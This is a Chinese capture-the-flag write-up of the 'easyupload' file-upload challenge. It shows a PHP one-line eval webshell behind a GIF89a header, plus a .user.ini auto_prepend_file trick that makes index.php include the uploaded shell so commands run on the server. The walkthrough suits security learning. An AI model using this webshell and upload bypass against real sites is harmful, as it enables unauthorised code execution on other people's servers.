攻防世界: easyupload

攻防世界: easyupload

本次使用到的知识点如下:

  1. .user.ini文件的作用:

    .user.ini 是PHP的用户级配置文件 ,我们可以借助.user.ini轻松让所有php文件都"自动"包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

    • auto_prepend_file :在每个 PHP 文件开头自动插入另一个文件

    • auto_append_file :在每个 PHP 文件结尾自动插入另一个文件

bash 复制代码
auto_prepend_file = shell.jpg		
auto_append_file = /tmp/evil.php
  1. jepg的文件头部:GIF89a, 可以通过这个文件头部绕过文件内容的检查(网站常规的检查方式包括:前端判断后缀名,前端检查文件头部、后端通过请求头中的content-type, 后端文件名后缀、以及后端检查文件头部的内容
    • 对于前端检查,都可以很容易通过抓包的方式轻易绕过
    • 对于后端的检查,我们只能尽量满足它的需求,后缀检查我们就只能让后缀符合要求,或者文件头部符合要求。

题目描述

题目就两个按钮一个选择文件,另一个提交。

上传文件

由于这个题目是我第一次接触文件上传相关的漏洞,因此我自己尝试了一下就看题解了。

对于文件上传漏洞我总结了下面的思路:

  1. 想办法绕过文件上传的检查,你不能让前端和后端检查到你上传的文件不符合他们的要求,前端一般可以通过抓包改包来绕过,后端则测试其检查的内容,比如是否根据你传递的请求里面的content-type来决定。一般来说可以根据文件后缀、文件头部、content-type, 我们可以考虑从这几个的绕过着手
  2. 找到文件上传后的url连接 ,因为我们上传的文件我们需要让其中的代码被执行,如果上传的是php文件,访问对应的php文件就能够让里面的代码得到执行。本题需要利用配置文件.user.ini将我们上传的木马文件包含到正常的index.php文件中,才能使得我们的代码得到执行。
  3. 访问带木马文件的链接,然后传递我们需要的命令。

首先上传木马文件,文件的内容如下:

bash 复制代码
GIF89a
<?=eval($_GET['test'])?>

其反馈的结果如下图所示,还直接的告诉了我们上传的文件的路径/uploads/xxx!!!

尝试访问该路劲下的php文件,因为我们想要让我们的代码得到执行,直接访问我们上传的图片,php的解析引擎不会觉得我们访问的文件是代码,就不会执行。

如何让index.php包含我们上传的代码

这个就是用到了.user.ini文件的功能了,当服务器配置了这个功能的使用的时候,我们这个配置文件通过下面的配置,可以在每一个当前目录下的php文件的开头处导入我们配置的文件。

bash 复制代码
GIF89a
auto_prepend_file=test.jpg

再次访问index.php,本次访问就会将我们的代码包含

接下来就是传递我们想要执行的命令了!!!

由于前面我们的一句话木马是<?=eval($_GET['test'])?>, 因此我们在get参数中传递我们需要的命令即可,使用ls命令看看是否能执行,结果如下:

使用find命令找到可疑的文件,如下:

查看flag文件,得到结果

相关推荐
killerbasd1 小时前
牧苏苏传 我不装了 4/7
前端·javascript·vue.js
吴声子夜歌1 小时前
ES6——二进制数组详解
前端·ecmascript·es6
码事漫谈2 小时前
手把手带你部署本地模型,让你Token自由(小白专属)
前端·后端
ZC跨境爬虫2 小时前
【爬虫实战对比】Requests vs Scrapy 笔趣阁小说爬虫,从单线程到高效并发的全方位升级
前端·爬虫·scrapy·html
爱上好庆祝2 小时前
svg图片
前端·css·学习·html·css3
王夏奇2 小时前
python中的__all__ 具体用法
java·前端·python
大家的林语冰3 小时前
《前端周刊》尤大开源 Vite+ 全家桶,前端工业革命启动;尤大爆料 Void 云服务新产品,Vite 进军全栈开发;ECMA 源码映射规范......
前端·javascript·vue.js
jiayong233 小时前
第 8 课:开始引入组合式函数
前端·javascript·学习
田八3 小时前
聊聊AI的发展史,AI的爆发并不是偶然
前端·人工智能·程序员
zhanghongbin013 小时前
AI 采集器:Claude Code、OpenAI、LiteLLM 监控
java·前端·人工智能